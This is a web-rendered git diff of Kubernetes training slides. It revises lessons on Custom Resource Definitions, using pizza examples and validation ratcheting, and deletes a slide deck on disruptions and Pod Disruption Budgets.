- Kubernetes 1.??: `apiextensions.k8s.io/v1beta1` introduced
|
||||
|
||||
- Kubernetes 1.16: `apiextensions.k8s.io/v1` introduced
|
||||
|
||||
- Kubernetes 1.22: `apiextensions.k8s.io/v1beta1` [removed][changes-in-122]
|
||||
|
||||
- Kubernetes 1.25: [CEL validation rules available in beta][crd-validation-rules-beta]
|
||||
|
||||
- Kubernetes 1.28: [validation ratcheting][validation-ratcheting] in [alpha][feature-gates]
|
||||
|
||||
- Kubernetes 1.29: [CEL validation rules available in GA][cel-validation-rules]
|
||||
|
||||
- Kubernetes 1.30: [validation ratcheting][validation-ratcheting] in [beta][feature-gates]; enabled by default
|
||||
|
||||
[crd-validation-rules-beta]: https://kubernetes.io/blog/2022/09/23/crd-validation-rules-beta/
|
||||
[cel-validation-rules]: https://kubernetes.io/docs/tasks/extend-kubernetes/custom-resources/custom-resource-definitions/#validation-rules
|
||||
[validation-ratcheting]: https://github.com/kubernetes/enhancements/tree/master/keps/sig-api-machinery/4008-crd-ratcheting
|
||||
[feature-gates]: https://kubernetes.io/docs/reference/command-line-tools-reference/feature-gates/#feature-gates-for-alpha-or-beta-features
|
||||
[changes-in-122]: https://kubernetes.io/blog/2021/07/14/upcoming-changes-in-kubernetes-1-22/
|
||||
|
||||
---
|
||||
|
||||
## First slice of pizza
|
||||
|
||||
```yaml
|
||||
@@ -68,6 +42,8 @@ Things related to Custom Resource Definitions:
|
||||
|
||||
(a few optional things become mandatory, see [this guide](https://kubernetes.io/docs/reference/using-api/deprecation-guide/#customresourcedefinition-v122) for details)
|
||||
|
||||
- `apiextensions.k8s.io/v1beta1` is available since Kubernetes 1.16
|
||||
|
||||
---
|
||||
|
||||
## Second slice of pizza
|
||||
@@ -120,9 +96,9 @@ The YAML below defines a resource using the CRD that we just created:
|
||||
kind: Pizza
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: hawaiian
|
||||
name: napolitana
|
||||
spec:
|
||||
toppings: [ cheese, ham, pineapple ]
|
||||
toppings: [ mozzarella ]
|
||||
```
|
||||
|
||||
.lab[
|
||||
@@ -138,7 +114,11 @@ spec:
|
||||
|
||||
## Type validation
|
||||
|
||||
- Recent versions of Kubernetes will issue errors about unknown fields
|
||||
- Older versions of Kubernetes will accept our pizza definition as is
|
||||
|
||||
- Newer versions, however, will issue warnings about unknown fields
|
||||
|
||||
(and if we use `--validate=false`, these fields will simply be dropped)
|
||||
|
||||
- We need to improve our OpenAPI schema
|
||||
|
||||
@@ -146,28 +126,6 @@ spec:
|
||||
|
||||
---
|
||||
|
||||
## Creating a bland pizza
|
||||
|
||||
- Let's try to create a pizza anyway!
|
||||
|
||||
.lab[
|
||||
|
||||
- Only provide the most basic YAML manifest:
|
||||
```bash
|
||||
kubectl create -f- <<EOF
|
||||
kind: Pizza
|
||||
apiVersion: container.training/v1alpha1
|
||||
metadata:
|
||||
name: hawaiian
|
||||
EOF
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
- That should work! (As long as we don't try to add pineapple😁)
|
||||
|
||||
---
|
||||
|
||||
## Third slice of pizza
|
||||
|
||||
- Let's add a full OpenAPI v3 schema to our Pizza CRD
|
||||
@@ -250,42 +208,24 @@ Note: we can update a CRD without having to re-create the corresponding resource
|
||||
|
||||
---
|
||||
|
||||
## Validation woes
|
||||
## Better data validation
|
||||
|
||||
- Let's check what happens if we try to update our pizzas
|
||||
- Let's change the data schema so that the sauce can only be `red` or `white`
|
||||
|
||||
- This will be implemented by @@LINK[k8s/pizza-5.yaml]
|
||||
|
||||
.lab[
|
||||
|
||||
- Try to add a label:
|
||||
- Update the Pizza CRD:
|
||||
```bash
|
||||
kubectl label pizza --all deliciousness=9001
|
||||
kubectl apply -f ~/container.training/k8s/pizza-5.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
- It works for the pizzas that have `sauce` and `toppings`, but not the other one!
|
||||
|
||||
- The other one doesn't pass validation, and *can't be modified*
|
||||
|
||||
---
|
||||
|
||||
## First, let's fix this!
|
||||
|
||||
- Option 1: delete the pizza
|
||||
|
||||
*(deletion isn't subject to validation)*
|
||||
|
||||
- Option 2: update the pizza to add `sauce` and `toppings`
|
||||
|
||||
*(writing a pizza that passes validation is fine)*
|
||||
|
||||
- Option 3: relax the validation rules
|
||||
|
||||
---
|
||||
|
||||
## Next, explain what's happening
|
||||
## Validation *a posteriori*
|
||||
|
||||
- Some of the pizzas that we defined earlier *do not* pass validation
|
||||
|
||||
@@ -341,8 +281,6 @@ Note: we can update a CRD without having to re-create the corresponding resource
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Migrating database content
|
||||
|
||||
- We need to *serve* a version as long as we *store* objects in that version
|
||||
@@ -357,58 +295,6 @@ class: extra-details
|
||||
|
||||
---
|
||||
|
||||
## Validation ratcheting
|
||||
|
||||
- Good news: it's not always necessary to introduce new versions
|
||||
|
||||
(and to write the associated conversion webhooks)
|
||||
|
||||
- *Validation ratcheting allows updates to custom resources that fail validation to succeed if the validation errors were on unchanged keypaths*
|
||||
|
||||
- In other words: allow changes that don't introduce further validation errors
|
||||
|
||||
- This was introduced in Kubernetes 1.28 (alpha), enabled by default in 1.30 (beta)
|
||||
|
||||
- The rules are actually a bit more complex
|
||||
|
||||
- Another (maybe more accurate) explanation: allow to tighten or loosen some field definitions
|
||||
|
||||
---
|
||||
|
||||
## Validation ratcheting example
|
||||
|
||||
- Let's change the data schema so that the sauce can only be `red` or `white`
|
||||
|
||||
- This will be implemented by @@LINK[k8s/pizza-5.yaml]
|
||||
|
||||
.lab[
|
||||
|
||||
- Update the Pizza CRD:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/pizza-5.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Testing validation ratcheting
|
||||
|
||||
- This should work with Kubernetes 1.30 and above
|
||||
|
||||
(but give an error for the `brownie` pizza with previous versions of K8S)
|
||||
|
||||
.lab[
|
||||
|
||||
- Add another label:
|
||||
```bash
|
||||
kubectl label pizzas --all food=definitely
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Even better data validation
|
||||
|
||||
- If we need more complex data validation, we can use a validating webhook
|
||||
|
||||
@@ -1,513 +0,0 @@
|
||||
# Disruptions
|
||||
|
||||
In a perfect world...
|
||||
|
||||
- hardware never fails
|
||||
|
||||
- software never has bugs
|
||||
|
||||
- ...and never needs to be updated
|
||||
|
||||
- ...and uses a predictable amount of resources
|
||||
|
||||
- ...and these resources are infinite anyways
|
||||
|
||||
- network latency and packet loss are zero
|
||||
|
||||
- humans never make mistakes
|
||||
|
||||
--
|
||||
|
||||
😬
|
||||
|
||||
---
|
||||
|
||||
## Disruptions
|
||||
|
||||
In the real world...
|
||||
|
||||
- hardware will fail randomly (without advance notice)
|
||||
|
||||
- software has bugs
|
||||
|
||||
- ...and we constantly add new features
|
||||
|
||||
- ...and will sometimes use more resources than expected
|
||||
|
||||
- ...and these resources are limited
|
||||
|
||||
- network latency and packet loss are NOT zero
|
||||
|
||||
- humans make mistake (shutting down the wrong machine, the wrong app...)
|
||||
|
||||
---
|
||||
|
||||
## Disruptions
|
||||
|
||||
- In Kubernetes, a "disruption" is something that stops the execution of a Pod
|
||||
|
||||
- There are **voluntary** and **involuntary** disruptions
|
||||
|
||||
- voluntary = directly initiated by humans (including by mistake!)
|
||||
|
||||
- involuntary = everything else
|
||||
|
||||
- In this section, we're going to see what they are and how to prevent them
|
||||
|
||||
(or at least, mitigate their effects)
|
||||
|
||||
---
|
||||
|
||||
## Node outage
|
||||
|
||||
- Example: hardware failure (server or network), low-level error
|
||||
|
||||
(includes kernel bugs, issues affecting underlying hypervisors or infrastructure...)
|
||||
|
||||
- **Involuntary** disruption (even if it results from human error!)
|
||||
|
||||
- Consequence: all workloads on that node become unresponsive
|
||||
|
||||
- Mitigations:
|
||||
|
||||
- scale workloads to at least 2 replicas (or more if quorum is needed)
|
||||
|
||||
- add anti-affinity scheduling constraints (to avoid having all pods on the same node)
|
||||
|
||||
---
|
||||
|
||||
## Node outage play-by-play
|
||||
|
||||
- Node goes down (or disconnected from network)
|
||||
|
||||
- Its lease (in Namespace `kube-node-lease`) doesn't get renewed
|
||||
|
||||
- Controller manager detects that and mark the node as "unreachable"
|
||||
|
||||
(this adds both a `NoSchedule` and `NoExecute` taints to the node)
|
||||
|
||||
- Eventually, the `NoExecute` taint will evict these pods
|
||||
|
||||
- This will trigger creation of replacement pods by owner controllers
|
||||
|
||||
(except for pods with a stable network identity, e.g. in a Stateful Set!)
|
||||
|
||||
---
|
||||
|
||||
## Node outage notes
|
||||
|
||||
- By default, pods will tolerate the `unreachable:NoExecute` taint for 5 minutes
|
||||
|
||||
(toleration automatically added by Admission controller `DefaultTolerationSeconds`)
|
||||
|
||||
- Pods of a Stateful Set don't recover automatically:
|
||||
|
||||
- as long as the Pod exists, a replacement Pod can't be created
|
||||
|
||||
- the Pod will exist as long as its Node exists
|
||||
|
||||
- deleting the Node (manually or automatically) will recover the Pod
|
||||
|
||||
---
|
||||
|
||||
## Memory/disk pressure
|
||||
|
||||
- Example: available memory on a node goes below a specific threshold
|
||||
|
||||
(because a pod is using too much memory and no limit was set)
|
||||
|
||||
- **Involuntary** disruption
|
||||
|
||||
- Consequence: kubelet starts to *evict* some pods
|
||||
|
||||
- Mitigations:
|
||||
|
||||
- set *resource limits* on containers to prevent them from using too much resources
|
||||
|
||||
- set *resource requests* on containers to make sure they don't get evicted
|
||||
<br/>
|
||||
(as long as they use less than what they requested)
|
||||
|
||||
- make sure that apps don't use more resources than what they've requested
|
||||
|
||||
---
|
||||
|
||||
## Memory/disk pressure play-by-play
|
||||
|
||||
- Memory leak in an application container, slowly causing very high memory usage
|
||||
|
||||
- Overall free memory on the node goes below the *soft* or the *hard* threshold
|
||||
|
||||
(default hard threshold = 100Mi; default soft threshold = none)
|
||||
|
||||
- When reaching the *soft* threshold:
|
||||
|
||||
- kubelet waits until the "eviction soft grace period" expires
|
||||
|
||||
- then (if resource usage is still above the threshold) it gracefully evicts pods
|
||||
|
||||
- When reaching the *hard* threshold:
|
||||
|
||||
- kubelet immediately and forcefully evicts pods
|
||||
|
||||
---
|
||||
|
||||
## Which pods are evicted?
|
||||
|
||||
- Kubelet only considers pods that are using *more* than what they requested
|
||||
|
||||
(and only for the resource that is under pressure, e.g. RAM or disk usage)
|
||||
|
||||
- First, it sorts pods by *priority¹* (as set with the `priorityClassName` in the pod spec)
|
||||
|
||||
- Then, by how much their resource usage exceeds their request
|
||||
|
||||
(again, for the resource that is under pressure)
|
||||
|
||||
- It evicts pods until enough resources have been freed up
|
||||
|
||||
---
|
||||
|
||||
## Soft (graceful) vs hard (forceful) eviction
|
||||
|
||||
- Soft eviction = graceful shutdown of the pod
|
||||
|
||||
(honor's the pod `terminationGracePeriodSeconds` timeout)
|
||||
|
||||
- Hard eviction = immediate shutdown of the pod
|
||||
|
||||
(kills all containers immediately)
|
||||
|
||||
---
|
||||
|
||||
## Memory/disk pressure notes
|
||||
|
||||
- If resource usage increases *very fast*, kubelet might not catch it fast enough
|
||||
|
||||
- For memory: this will trigger the kernel out-of-memory killer
|
||||
|
||||
- containers killed by OOM are automatically restarted (no eviction)
|
||||
|
||||
- eviction might happen at a later point though (if memory usage stays high)
|
||||
|
||||
- For disk: there is no "out-of-disk" killer, but writes will fail
|
||||
|
||||
- the `write` system call fails with `errno = ENOSPC` / `No space left on device`
|
||||
|
||||
- eviction typically happens shortly after (when kubelet catches up)
|
||||
|
||||
- When relying on disk/memory bursts a lot, using `priorityClasses` might help
|
||||
|
||||
---
|
||||
|
||||
## Memory/disk pressure delays
|
||||
|
||||
- By default, no soft threshold is defined
|
||||
|
||||
- Defining it requires setting both the threshold and the grace period
|
||||
|
||||
- Grace periods can be different for the different types of resources
|
||||
|
||||
- When a node is under pressure, kubelet places a `NoSchedule` taint
|
||||
|
||||
(to avoid adding more pods while the pod is under pressure)
|
||||
|
||||
- Once the node is no longer under pressure, kubelet clears the taint
|
||||
|
||||
(after waiting an extra timeout, `evictionPressureTransitionPeriod`, 5 min by default)
|
||||
|
||||
---
|
||||
|
||||
## Accidental deletion
|
||||
|
||||
- Example: developer deletes the wrong Deployment, the wrong Namespace...
|
||||
|
||||
- **Voluntary** disruption
|
||||
|
||||
(from Kubernetes' perspective!)
|
||||
|
||||
- Consequence: application is down
|
||||
|
||||
- Mitigations:
|
||||
|
||||
- only deploy to production systems through e.g. gitops workflows
|
||||
|
||||
- enforce peer review of changes
|
||||
|
||||
- only give users limited (e.g. read-only) access to production systems
|
||||
|
||||
- use canary deployments (might not catch all mistakes though!)
|
||||
|
||||
---
|
||||
|
||||
## Bad code deployment
|
||||
|
||||
- Example: critical bug introduced, application crashes immediately or is non-functional
|
||||
|
||||
- **Voluntary** disruption
|
||||
|
||||
(again, from Kubernetes' perspective!)
|
||||
|
||||
- Consequence: application is down
|
||||
|
||||
- Mitigations:
|
||||
|
||||
- readiness probes can mitigate immediate crashes
|
||||
<br/>
|
||||
(rolling update continues only when enough pods are ready)
|
||||
|
||||
- delayed crashes will require a rollback
|
||||
<br/>
|
||||
(manual intervention, or automated by a canary system)
|
||||
|
||||
---
|
||||
|
||||
## Node shutdown
|
||||
|
||||
- Example: scaling down a cluster to save money
|
||||
|
||||
- **Voluntary** disruption
|
||||
|
||||
- Consequence:
|
||||
|
||||
- all workloads running on that node are terminated
|
||||
|
||||
- this might disrupt workloads that have too many replicas on that node
|
||||
|
||||
- or workloads that should not be interrupted at all
|
||||
|
||||
- Mitigations:
|
||||
|
||||
- terminate workloads one at a time, coordinating with users
|
||||
|
||||
--
|
||||
|
||||
🤔
|
||||
|
||||
---
|
||||
|
||||
## Node shutdown
|
||||
|
||||
- Example: scaling down a cluster to save money
|
||||
|
||||
- **Voluntary** disruption
|
||||
|
||||
- Consequence:
|
||||
|
||||
- all workloads running on that node are terminated
|
||||
|
||||
- this might disrupt workloads that have too many replicas on that node
|
||||
|
||||
- or workloads that should not be interrupted at all
|
||||
|
||||
- Mitigations:
|
||||
|
||||
- ~~terminate workloads one at a time, coordinating with users~~
|
||||
|
||||
- use Pod Disruption Budgets
|
||||
|
||||
---
|
||||
|
||||
## Pod Disruption Budgets
|
||||
|
||||
- A PDB is a kind of *contract* between:
|
||||
|
||||
- "admins" = folks maintaining the cluster (e.g. adding/removing/updating nodes)
|
||||
|
||||
- "users" = folks deploying apps and workloads on the cluster
|
||||
|
||||
- A PDB expresses something like:
|
||||
|
||||
*in that particular set of pods, do not "disrupt" more than X at a time*
|
||||
|
||||
- Examples:
|
||||
|
||||
- in that set of frontend pods, do not disrupt more than 1 at a time
|
||||
|
||||
- in that set of worker pods, always have at least 10 ready
|
||||
<br/>
|
||||
(do not disrupt them if it would bring down the number of ready pods below 10)
|
||||
|
||||
---
|
||||
|
||||
## PDB - user side
|
||||
|
||||
- Cluster users create a PDB with a manifest like this one:
|
||||
|
||||
```yaml
|
||||
@@INCLUDE[k8s/pod-disruption-budget.yaml]
|
||||
```
|
||||
|
||||
- The PDB must indicate either `minAvailable` or `maxUnavailable`
|
||||
|
||||
---
|
||||
|
||||
## Rounding logic
|
||||
|
||||
- Percentages are rounded **up**
|
||||
|
||||
- When specifying `maxUnavailble` as a percentage, this can result in a higher perecentage
|
||||
|
||||
(e.g. `maxUnavailable: 50%` with 3 pods can result in 2 pods being unavailable!)
|
||||
|
||||
---
|
||||
|
||||
## Unmanaged pods
|
||||
|
||||
- Specifying `minAvailable: X` works all the time
|
||||
|
||||
- Specifying `minAvailable: X%` or `maxUnavaiable` requires *managed pods*
|
||||
|
||||
(pods that belong to a controller, e.g. Replica Set, Stateful Set...)
|
||||
|
||||
- This is because the PDB controller needs to know the total number of pods
|
||||
|
||||
(given by the `replicas` field, not merely by counting pod objects)
|
||||
|
||||
- The PDB controller will try to resolve the controller using the pod selector
|
||||
|
||||
- If that fails, the PDB controller will emit warning events
|
||||
|
||||
(visible with `kubectl describe pdb ...`)
|
||||
|
||||
---
|
||||
|
||||
## Zero
|
||||
|
||||
- `maxUnavailable: 0` means "do not disrupt my pods"
|
||||
|
||||
- Same thing if `minAvailable` is greater than or equal to the number of pods
|
||||
|
||||
- In that case, cluster admins are supposed to get in touch with cluster users
|
||||
|
||||
- This will prevent fully automated operation
|
||||
|
||||
(and some cluster admins automated systems might not honor that request)
|
||||
|
||||
---
|
||||
|
||||
## PDB - admin side
|
||||
|
||||
- As a cluster admin, we need to follow certain rules
|
||||
|
||||
- Only shut down (or restart) a node when no pods are running on that node
|
||||
|
||||
(except system pods belonging to Daemon Sets)
|
||||
|
||||
- To remove pods running on a node, we should use the *eviction API*
|
||||
|
||||
(which will check PDB constraints and honor them)
|
||||
|
||||
- To prevent new pods from being scheduled on a node, we can use a *taint*
|
||||
|
||||
- These operations are streamlined by `kubectl drain`, which will:
|
||||
|
||||
- *cordon* the node (add a `NoSchedule` taint)
|
||||
|
||||
- invoke the *eviction API* to remove pods while respecting their PDBs
|
||||
|
||||
---
|
||||
|
||||
## Theory vs practice
|
||||
|
||||
- `kubectl drain` won't evict pods using `emptyDir` volumes
|
||||
|
||||
(unless the `--delete-emptydir-data` flag is passed as well)
|
||||
|
||||
- Make sure that `emptyDir` volumes don't hold anything important
|
||||
|
||||
(they shouldn't, but... who knows!)
|
||||
|
||||
- Kubernetes lacks a standard way for users to express:
|
||||
|
||||
*this `emptyDir` volume can/cannot be safely deleted*
|
||||
|
||||
- If a PDB forbids an eviction, this requires manual coordination
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Unhealthy pod eviction policy
|
||||
|
||||
- By default, unhealthy pods can only be evicted if PDB allows it
|
||||
|
||||
(unhealthy = running, but not ready)
|
||||
|
||||
- In many cases, unhealthy pods aren't healthy anyway, and can be removed
|
||||
|
||||
- This behavior is enabled by setting the appropriate field in the PDB manifest:
|
||||
|
||||
```yaml
|
||||
spec:
|
||||
unhealthyPodEvictionPolicy: AlwaysAllow
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Node upgrade
|
||||
|
||||
- Example: upgrading kubelet or the Linux kernel on a node
|
||||
|
||||
- **Voluntary** disruption
|
||||
|
||||
- Consequence:
|
||||
|
||||
- all workloads running on that node are temporarily interrupted, and restarted
|
||||
|
||||
- this might disrupt these workloads
|
||||
|
||||
- Mitigations:
|
||||
|
||||
- migrate workloads off the done first (as if we were shutting it down)
|
||||
|
||||
---
|
||||
|
||||
## Node upgrade notes
|
||||
|
||||
- Is it necessary to drain a node before doing an upgrade?
|
||||
|
||||
- From [the documentation][node-upgrade-docs]:
|
||||
|
||||
*Draining nodes before upgrading kubelet ensures that pods are re-admitted and containers are re-created, which may be necessary to resolve some security issues or other important bugs.*
|
||||
|
||||
- It's *probably* safe to upgrade in-place for:
|
||||
|
||||
- kernel upgrades
|
||||
|
||||
- kubelet patch-level upgrades (1.X.Y → 1.X.Z)
|
||||
|
||||
- It's *probably* better to drain the node for minor revisions kubelet upgrades (1.X → 1.Y)
|
||||
|
||||
- In doubt, test extensively in staging environments!
|
||||
|
||||
[node-upgrade-docs]: https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/#manual-deployments
|
||||
|
||||
---
|
||||
|
||||
## Manual rescheduling
|
||||
|
||||
- Example: moving workloads around to accommodate noisy neighbors or other issues
|
||||
|
||||
(e.g. pod X is doing a lot of disk I/O and this is starving other pods)
|
||||
|
||||
- **Voluntary** disruption
|
||||
|
||||
- Consequence:
|
||||
|
||||
- the moved workloads are temporarily interrupted
|
||||
|
||||
- Mitigations:
|
||||
|
||||
- define an appropriate number of replicas, declare PDBs
|
||||
|
||||
- use the [eviction API][eviction-API] to move workloads
|
||||
|
||||
[eviction-API]: https://kubernetes.io/docs/concepts/scheduling-eviction/api-eviction/
|
||||
|
||||
???
|
||||
|
||||
:EN:- Voluntary and involuntary disruptions
|
||||
:EN:- Pod Disruption Budgets
|
||||
:FR:- "Disruptions" volontaires et involontaires
|
||||
:FR:- Pod Disruption Budgets
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user